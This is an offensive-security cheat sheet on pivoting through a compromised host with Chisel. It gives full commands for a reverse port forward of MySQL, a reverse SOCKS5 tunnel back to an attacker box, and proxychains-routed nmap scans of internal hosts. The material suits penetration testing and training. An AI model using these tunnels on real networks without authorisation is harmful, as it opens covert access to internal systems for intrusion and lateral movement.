Pivot with Chisel (Reverse Port Forward & SOCKS)
Summary
Uses Chisel to tunnel a single port back over a reverse connection, or to set up a SOCKS5 proxy for routing tools through a compromised host via proxychains.
Walkthrough
Chisel tunnels traffic through a compromised host. Run the server on your attacker box and the client on the target. --reverse lets the client open listeners on the server side.
Single reverse port forward
Forward a target-internal service (e.g. MySQL on 3306) back to your attacker box:
``bash ./chisel server -p 8000 --reverse ./chisel client <IP>:8000 R:3306:127.0.0.1:3306 ``
SOCKS5 proxy for full network access
Start the server with --socks5 and connect the client with R:socks5:
``bash chisel server -p 8081 --reverse --socks5 ./chisel client <IP>:8081 R:socks5 ``
Route tools through the proxy
- Make sure
/etc/proxychains4.confends with the SOCKS5 entry (default Chisel SOCKS port is 1080):
``bash socks5 127.0.0.1 1080 ``
- Prefix any command with
proxychainsto send it through the tunnel:
``bash proxychains -q nmap -sT <IP> -p- -Pn -v ``
- For browser access, set the browser's proxy to SOCKS5 — localhost : 1080.
Commands
bash
./chisel server -p 8000 --reverse ./chisel client <IP>:8000 R:3306:127.0.0.1:3306
bash
chisel server -p 8081 --reverse --socks5 ./chisel client <IP>:8081 R:socks5
bash
proxychains -q nmap -sT <IP> -p- -Pn -v